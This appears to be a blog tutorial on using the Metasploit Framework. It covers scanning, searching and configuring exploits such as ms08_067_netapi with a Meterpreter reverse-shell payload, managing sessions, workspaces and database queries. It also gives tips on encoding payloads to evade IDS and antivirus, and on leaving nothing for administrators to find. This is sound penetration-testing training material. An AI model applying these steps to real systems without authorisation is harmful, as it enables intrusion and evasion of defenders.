The Metasploit Framework is not something that runs out and exploits all available targets automatically. This is not a script kiddie tool for aiming and pulling a trigger. This a serious toolbox full of modules, exploits, and payload templates. You need to know how to put it all together to get anything meaningful out of it.
- Find targets.
- Find vulnerabilities.
- Exploit the vulnerabilities.
- Drop a payload.
- Hopefully run some shell code with the payload.
- Own the box.
Metasploit Framework Terms
Before getting started with the Metasploit Framework (MSF), I need to explain a few things from Metasploit’s perspective:
- An Exploit allows an attacker to take advantage of a flaw (also called a bug) within the target system’s operating system, a software application, a running service, etc. that results in a favorable outcome for the attacker. In another words, it allows you to bypass whatever security protects the system under normal operation.
- A Payload is the code that we want the compromised system to execute. A handy payload is a reverse shell.
- Shellcode is a set of instructions, typically wrote in assembly language, which are packaged up in a payload. Commonly what happens is a command shell, reverse shell, or Meterpreter shell is returned.
- A Module is code that can be used by the Metasploit Framework. A modules exploits, auxiliary (utilities like scanners), and post. You can interchange modules to make it powerful.
- A Listener is a service that listens on the attackers machine that waits for a compromised target to call it back. Typically you need this to bypass firewalls. If the target calls from a private IP address behind the organization’s firewall, out to the public Internet, the target’s firewall will typically allow it.
Interfaces to the Metasploit Framework
You can interface with the Metasploit Framework (MSF) in different ways:
- The Console (
msfconsole) – This is a standalone application that provides user friendly access to the all of the options, settings as well as being able to perform everything like launching exploits, loading modules, enumerate targets, create listeners, or run mass exploration with a fire and wait nuclear option.
- Command line (
msfcli) – Runs directly from the Linux or Windows command line. Use this to script the framework into other tools.
- Armitage GUI (
armitage) – Full featured graphical user interface. For details check out our Armitage page.
- Before you use the msfconsole, you may need to start the database:
root@kali:~# service postgresql start
- Start up the MSF Console:
- You should see one of the many Metasploit banners, the version and number exploits, auxiliary, post, payloads, encoders, and nops.
- Then prompt will change to ‘msf >’
- Check to see if the PostgreSQL database is connected to MSF:
msf > db_status
- To run nmap and have the results go to the database use db_nmap:
msf > db_nmap -sS -Pn -A 192.168.1.0/24
- Check the results in the database with:
msf > hosts
msf > services
- Show all exploits in the framework.
msf > show exploits
- Show all payloads in the framework.
msf > show payloads
- Show all the auxiliary modules in the framework.
msf > show auxiliary
- Search for exploits or modules in the framework.
msf > search____ <– whatever…
msf > search cisco
msf > search linksys
msf > search windows
msf > search lenovo
msf > search ms15
- To see what the exploit or module does use the info command followed by the exploit path and name. It’s best to search then copy and paste.
msf > info____ <–name of an exploit, module, etc…
msf > info exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader
msf > info exploit/windows/local/ms14_009_ie_dfsvc
msf > info scanner/portscan/syn
- When you decide on which module or exploit to fire at the target,
msf > use scanner/portscan/syn
msf auxiliary(syn) > show options
msf auxiliary(syn) > set rhosts 192.168.0.0/12
msf auxiliary(syn) > set ports 21-1434,3389
msf auxiliary(syn) > run
- Most modules and exploits will require you to at least provide the RHOST (remote host, aka the target), you do this with the
setcommand. Rather than setting it every time you go into a new module or exploit, you can set it globally with
msf exploit(msadc) > set rhost 192.168.0.0/24
msf > setg rhost 192.168.0.0/24
- You can check to see whether the target is vulnerable before actually launching an active attack.
msf exploit(msadc) > check
- To see the options set for a module or exploit, use show options and show advanced.
msf auxiliary(syn) > show options
msf auxiliary(syn) > show advanced
- Some of the exploits are aimed at very specific operating systems and patch levels, by default it is set to automatic (Id = 0), but automatic doesn’t work well will every exploit. Some of the exploits work better if you tell it specifically which version and patch level (via the id number). Also you will want to set a payload for the exploit to enable you to take actions against the target once it has been successfully exploited.
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > set target 3
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
- Now when it comes to exploiting the target, you can use exploit and/or run, they seem to do the same thing.
msf exploit(msadc) > exploit
msf exploit(msadc) > run
- exploit has a few options:
msf exploit(msadc) > exploit -h<– shows help for the exploit command.
msf exploit(msadc) > exploit -j<– runs the exploit as a job in the background.
msf exploit(msadc) > exploit -z<– don’t interact with the session after successful exploitation.
msf exploit(msadc) > exploit -e some_encoder_name<– specify the payload encoder to evade IDS.
- After you gain a command line interface on one or many targets, you interact with them using the
- To list sessions available to interact with.
msf > sessions -l
- To list all sessions available as well as showing the verbose fields, such as with exploits worked to start the session.
msf > sessions -l -v
- To execute a command on all live Meterpreter sessions.
msf > sessions -c_____ <– the name of some command.
- To run a Meterpreter script on all Meterpreter live sessions.
msf > sessions -s_____ <– the name of the script.
- To upgrade a normal Win32 shell to a Meterpreter comsole.
msf > sessions -u_____ <– the sessionID.
- It’s always best when you are finished to kill all live sessions and leave nothing open for the system and network administrators to find.
msf > sessions -k
msfencode– Use this after
msfpayloadwhich helps the code in the payload avoid bad characters, avoid IDS and virus signature detection.
nasm_shell.rb– Use this to read the assembly code.
Updating Metasploit on Kali Linux
If you are having an issue with msfupdate always saying there’s no updates, then edit the
/etc/apt/sources.list file and check the repositories it needs to function. Make sure the top (uncommented) line exist in the file. The others are old now.
deb http://http.kali.org/kali kali-rolling main contrib non-free
# deb http://http.kali.org/kali sana main non-free contrib
# deb http://security.kali.org/kali-security sana/updates main contrib non-free
# deb http://old.kali.org/kali moto main non-free contrib
If it still isn’t working check kali.org for the latest repo changes.
If you will be using MSF for multiple clients or environments (a.k.a. Consultants) then you will need to separate them by Workspace. When you start msfconsole for the first time, you will be in the default
msf > workspaceto list all the workspace.
msf > workspace -vto list the workspaces with counts of hosts, services, vulns, creds, loots, and notes.
msf > workspace -a MyNewWorkspace– to ADD a new workspace.
msf > workspace -r oldWorkspaceName newWS– to RENAME a workspace.
msf > workspace -d MyOldAssWorkspace– to DELETE a workspace.
msf > workspace -Ddelete ALL workspaces (a.k.a. nuke from high orbit).
msf > workspace -hto get help.
Querying the MSF Postgres Database
Once you collect the data, you will want to dig down and find the interesting things.
Query the Services
- To show which services are open
- msf >
- msf >
- To show all available columns (note that the address will always be shown on the left side)
msf > services -c created_at,info,name,port,proto,state,updated_at
- To show certain columns AND for a single hosts or subnet
msf > services -c proto,port,state,name 192.168.4.77
msf > services -c proto,port,state,name 192.168.4.0/24
- To drill down to find specific ports, such as web servers
msf > services -p 80,443
- To sort the results by the column number (e.g. the port is the 2nd column)
msf > services -O 2
- To export the results to a CSV file.
msf > services -p 80,433 -O 2 -o /root/somedir/somefile.csv
Query for Exploits
- To show exploits matching the year of the CVE
- To show exploits matching text in the name
- To show exploits for a particular platform
Query for Auxiliary things
- To show the scanners
search type:auxiliary name:scanner
Go to Github for the source code –> https://github.com/rapid7/metasploit-framework